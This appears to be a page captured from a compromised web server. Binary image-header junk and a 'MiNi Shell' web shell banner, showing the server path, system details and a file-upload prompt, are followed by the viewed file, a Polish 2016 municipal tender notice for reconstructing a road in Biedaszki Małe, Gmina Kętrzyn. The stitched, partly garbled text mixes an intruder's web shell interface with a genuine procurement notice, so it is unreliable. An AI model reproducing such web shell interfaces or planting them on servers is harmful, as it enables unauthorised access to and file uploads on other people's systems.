JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160523/129808-N-2016.html

<p class="kh_header"><b>Kętrzyn: Przebudowa drogi gminnej nr 126011N w Biedaszkach Małych, Gmina Kętrzyn.</b><br>
<b>Numer ogłoszenia: 129808 - 2016; data zamieszczenia: 23.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Kętrzyn , ul. Kościuszki 2, 11-400 Kętrzyn, woj. warmińsko-mazurskie, tel. 089 7512474 w. 17, faks 089 7512746.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.gminaketrzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi gminnej nr 126011N w Biedaszkach Małych, Gmina Kętrzyn..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przebudowa drogi gminnej 126011N w miejscowości Biedaszki Małe :

a) etap I - działka 123/1, obręb Biedaszki, Gmina Kętrzyn, odcinek drogi objęty zamówieniem:  od km 0+000,00  do km 0+693,40.        

        CPV: 
               45100000-8 - Przygotowanie terenu pod budowę,
               45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych;  roboty ziemne,
               45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii 
                                      lądowej i wodnej,
               45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei;
                                     wyrównywanie terenu,
               45233220-7  Roboty  w zakresie nawierzchni dróg

 b) etap II - działka 123/2, obręb Biedaszki, Gmina Kętrzyn, odcinek drogi objęty
           zamówieniem:  od km 0+006  do km 0+647.    

           CPV: 
               45100000-8 - Przygotowanie terenu pod budowę,
               45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne,
               45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii 
                                      lądowej i wodnej,
               45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei;
                                     wyrównywanie terenu,
               45233220-7  Roboty  w zakresie nawierzchni dróg

2. Zakres rzeczowy robót budowlanych  zawierają załączone formularze  cenowe-kosztorysy  ofertowe. Wykonawca zobowiązany jest załączyć do formularza oferty  formularz cenowy - kosztorys ofertowy dotyczący części zamówienia, na którą/które składana jest oferta, uzupełniony o ceny jednostkowe, wartości robót oraz wartość całkowitą brutto, stanowiącą cenę ofertową na daną część zamówienia.  Przy obliczaniu ceny ofertowej danej części zamówienia Wykonawca zobowiązany jest  uwzględnić wszystkie koszty związane z realizacją przedmiotu umowy zgodnie  z warunkami SIWZ (wraz z załączni-
    kami).

3. Wymagania techniczne i jakościowe dotyczące przedmiotu zamówienia określone zostały  w  dokumentacji budowlano-wykonawczej (projekty) oraz w specyfikacjach technicznych, stanowiących załączniki do SIWZ.

    W przypadku rozbieżności w opisie zamówienia  należy stosować następującą kolejność  interpretacji (ważności) dokumentów opisujących zamówienie  :
    1) SIWZ ze wzorem umowy i ewentualnymi wyjaśnieniami zamawiającego,
    2) przedmiar robót,
    3) dokumentacja budowlano-wykonawcza (projekty),
    4) specyfikacje techniczne .

4. Zamówienie zostanie zrealizowane z materiałów wykonawcy.
Jeżeli dokumenty opisujące przedmiot zamówienia, wskazują dla niektórych materiałów  lub urządzeń znaki towarowe lub pochodzenie, zamawiający dopuszcza składanie ofert równoważnych, tj. z zastosowaniem  materiałów i urządzeń innych producentów , pod  warunkiem zapewnienia nie gorszych parametrów technicznych . Wykazanie, iż  zamienione materiały lub urządzenia posiadają nie gorsze parametry techniczne jak te w dokumentacji przetargowej, będzie należało do obowiązków wykonawcy.


5. Do obowiązków wykonawcy, w ramach przysługującego mu wynagrodzenia, należy również  :

   1) wykonanie  i  utrzymanie  niezbędnego zaplecza,  
   2) opracowanie projektu  organizacji  ruchu  na  czas  prowadzenia  robót    objętych  niniejszym zamówieniem  zgodnie z  Ustawą z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (tekst jedn. Dz.U. 2003 r. Nr  58  poz.515  ze  zm.),  Rozporządzeniem  Ministra  Infrastruktury  z  dnia  3  lipca  w  sprawie  szczegółowych warunków  technicznych  dla  znaków  i  sygnałów  drogowych  oraz  urządzeń  bezpieczeństwa   ruchu  drogowego i  warunków  ich  umieszczania  na  drogach  (Dz.U.    z  2003  r.   Nr  220,  poz.  2181)  oraz  Rozporządzeniem  Ministra Infrastruktury  z  dnia 23  września  w  sprawie  szczegółowych  warunków  zarządzania  ruchem  na  drogach   oraz wykonywania nadzoru nad tym zarządzaniem (Dz.U. z 2003 r. Nr 177 poz.1729), 
   3)  przedstawienia  Zamawiającemu  w  ciągu  14  dni  od  podpisania  umowy  harmonogramu  rzeczowo-finansowego robót, celem jego uzgodnienia; w przypadku braku uzgodnienia harmonogramu przez Zamawiającego Wykonawca w terminie 7 dni od otrzymania informacji o braku uzgodnienia harmonogramu przedłoży nowy harmonogram uwzględniający uwagi Zamawiającego, 
   4) oznakowania  miejsca  robót    zgodnie  z  zatwierdzonym  projektem  organizacji  ruchu i  utrzymywania  tego oznakowania w należytym stanie przez cały czas robót,  
   5) obsługa geodezyjna robót, w tym inwentaryzacja geodezyjna powykonawcza,
   6) zgłoszenie i uzgodnienie z dysponentami urządzeń obcych znajdujących się w pasie drogowym zasad prowadzenia robót,
   7) zabezpieczenie instalacji i urządzeń na terenie robót i w jego bezpośrednim otoczeniu  przed ich zniszczeniem lub uszkodzeniem w trakcie wykonywania robót, 
   8) informowanie Zamawiającego lub osoby przez niego upoważnionej o terminie wykonania robót ulegających zakryciu,
  9) zapewnienie ciągłości ruchu pojazdów  i  pieszych w czasie  prowadzonych robót łącznie z jego właściwą organizacją; roboty związane z  przebudową  drogi będą  wykonywane  co  najwyżej  przy  częściowym  zamknięciu  tylko  jednego pasa ruchu,
  10)  przekazanie Zamawiającemu na jego żądanie materiałów rozbiórkowych, a w przeciwnym razie  zagospodarowanie ich we własnym zakresie, a w razie konieczności również zutylizowanie,
  11) uporządkowanie, po zakończeniu prac, terenu robót oraz innych wykorzystywanych przez wykonawcę terenów,
  12) usunięcie na swój koszt wad i usterek stwierdzonych w okresie rękojmi za wady  i w okresie gwarancji jakości.

6.  Zamówienie będzie realizowane na podstawie zgłoszenia robót budowlanych dokonanego przez zamawiającego.

7. Wymagany okres gwarancji dla  przedmiotu zamówienia - 5 lat od odbioru końcowego danej części zamówienia

8. Dla każdego etapu Zamawiający przewiduje  udzielenie zamówień uzupełniających, o których mowa w art.67ust.1 pkt 6 ustawy, o łącznej wielkości nie większej niż 50% wartości zamówienia podstawowego, zgodnych z przedmiotem zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień .  Wykonawcy nie przysługuje roszczenie o udzielenie zamówienia uzupełniającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Dla każdego etapu Zamawiający przewiduje  udzielenie zamówień uzupełniających,  o których mowa w art.67ust.1 pkt 6 ustawy, o łącznej wielkości nie większej niż 50% wartości zamówienia podstawowego, zgodnych z przedmiotem zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień .</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.23.00.00-8, 45.10.00.00-8, 45.11.00.00-1, 45.23.32.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania Wykonawca zobowiązany jest wnieść wadium w wysokości :
    1) 7 000,- zł (słownie:  siedem tysięcy złotych) dla części zamówienia obejmującej realizację etapu I;
    2) 15 000,- zł (słownie:  piętnaście tysięcy złotych) dla części zamówienia obejmującej realizację etapu II.
    Jeżeli oferta składana jest na oba etapy,  Wykonawca zobowiązany jest wnieść wadium  w wysokości 22 000,- zł (dwadzieścia dwa tysiące zł).
2. Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
   1)	pieniądzu;
   2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
   3)	gwarancjach bankowych;
   4)	gwarancjach ubezpieczeniowych;
   	5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy  z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości         (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4. Wadium w pieniądzu należy wnieść przelewem  na rachunek bankowy Zamawiającego:
 Nr 71 2030 0045 1110 0000 0287 4780
      z podaniem tytułu: Wadium - przebudowa drogi gminnej Nr 126011N w Biedaszkach Małych, etap I /etap II, Gmina Kętrzyn.
5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.  Wadium wnoszone w formie innej niż pieniądz musi być nieodwołalne i gwarantować wypłatę kwoty wadium w przypadkach przewidzianych ustawą, a oryginał dokumentu stanowiącego wadium należy dołączyć do oferty.
7.  Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy.
8. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana :
   1) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych  w ofercie;
   2) nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
   3) zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn  leżących po stronie wykonawcy;
   4) jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy,  z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25  ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy, co powodowało brak możliwości wybrania oferty  złożonej przez wykonawcę jako najkorzystniejszej.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie określa szczegółowych wymagań w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy - wzór oświadczenia stanowi zał. Nr 5  do SIWZ;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony, jeżeli wykonawca wykaże należyte wykonanie w ciągu ostatnich 5 lat przed upływem terminu składania  ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  co najmniej 1 roboty budowlanej o wartości co najmniej :  
a)  200 000,- zł (dwieście tysięcy zł) z Vat,  jeżeli oferta dotyczy tylko etapu I zgodnie  z Rozdz.1 ust.1, obejmującej wykonanie   bitumicznej nawierzchni drogowej,
b)  400 000,- zł (czterysta tysięcy zł) z Vat, jeżeli oferta dotyczy tylko etapu II lub etapu I i II zgodnie z Rozdz.1 ust.1, obejmującej wykonanie   bitumicznej nawierzchni drogowej, w przypadku wykonawców występujących wspólnie warunek  musi zostać spełniony  przez co najmniej jednego wykonawcę spośród  wykonawców występujących wspólnie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie określa szczegółowych wymagań w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy - wzór oświadczenia stanowi zał. Nr 5  do SIWZ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony, jeżeli wykonawca wykaże dysponowanie, w celu wykonania zamówienia:
- przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej, w zakresie odpowiednim do zakresu zamówienia,
- przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,  wentylacyjnych,  wodociągowych i kanalizacyjnych,  w zakresie odpowiednim do zakresu zamówienia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie określa szczegółowych wymagań w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy - wzór oświadczenia stanowi zał. Nr 5  do SIWZ;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.98</li>
<li>2 - Termin realizacji - 0.02</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Wszystkie zmiany warunków  umowy, pod rygorem nieważności, wymagają  formy pisemnej w postaci aneksu podpisanego przez obie strony umowy i mogą być  dokonane z zastrzeżeniem art. 144 ust.1 ustawy z dnia 29 stycznia 2004 r. - Prawo  zamówień publicznych  (Dz. U. z  2015 r. poz. 2164).

2. Zamawiający dopuszcza istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na  podstawie której dokonano wyboru Wykonawcy, w następujących zakresach:

1)  zmiany dokumentacji projektowej, jeżeli jest to niezbędne dla prawidłowego wykonania przedmiotu umowy lub uzasadnione ze względów technicznych lub użytkowych;       
2)  zmiany harmonogramu rzeczowo-finansowego robót, jeżeli :
     - nie koliduje to z możliwością zapewnienia prawidłowego finansowania zamówieniaprzez Zamawiającego,
     - nie wynik a to z opóźnień w realizacji zamówienia, spowodowanych okolicznościami leżącymi po stronie Wykonawcy,                                                                       
3) zmiany terminu realizacji zamówienia, w przypadku:
        a)   siły wyższej- zdarzenie zewnętrzne, niemożliwe do przewidzenia i niemożliwe do zapobieżenia, uniemożliwiające realizację zamówienia; 
        b)   czasu trwania procedur administracyjnych, mającego wpływ  obiektywny, niewynikający z opieszałości Wykonawcy, na termin wykonania  zamówienia;       
        c)   wystąpienia    konieczności    wykonania    robót    dodatkowych    lub   zamiennych,  udzielenia    zamówień dodatkowych lub uzupełniających, jeżeli te roboty lub zamówienia wstrzymują lub opóźniają realizację przedmiotu umowy;  
        d)   zmiany harmonogramu rzeczowo-finansowego robót, mającej wpływ na termin   realizacji zamówienia;      
4)  zmiany wynagrodzenia Wykonawcy, w przypadku:
        a)   zmiany urzędowej stawki podatku od towarów i usług (VAT)- zmiana wynagrodzenia o różnicę w kwocie podatku Vat;
        b)   zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art.2 ust.3-5 ustawy z dnia 10.10.2002r. o minimalnym wynagrodzeniu za pracę,  jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę;
        c)   zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne, jeżeli  zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę;

W przypadku wnioskowania o zmianę wynagrodzenia w okolicznościach, określonych wyżej, tj.pkt 4 lit. b i c, Wykonawca zobowiązany będzie wykazać wpływ określonych zmian  na koszty wykonania zamówienia przez Wykonawcę, a w szczególności przedstawić  kalkulację kosztów pracy z oferty oraz kosztów pracy uwzględniających określone wyżej  zmiany, w odniesieniu do ilości pracowników zatrudnionych przy realizacji  zamówienia, ilości przepracowywanych przez tych pracowników roboczogodzin oraz rodzajów posia-
 danych przez nich umów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.gminaketrzyn.pl/zamowienia_publiczne/110/status/rodzaj/wzp/zwr/#<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kętrzyn
ul. Kościuszki 2
11-400 Kętrzyn

pok.17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2016 godzina 10:00, miejsce: Urząd Gminy Kętrzyn
ul. Kościuszki 2
11-400 Kętrzyn

pok.16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje zawarcia umowy ramowej.
Inwestycja współfinansowana z :   PROW 2014-2020..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Etap I - działka 123/1, obręb Biedaszki, Gmina Kętrzyn..</p>
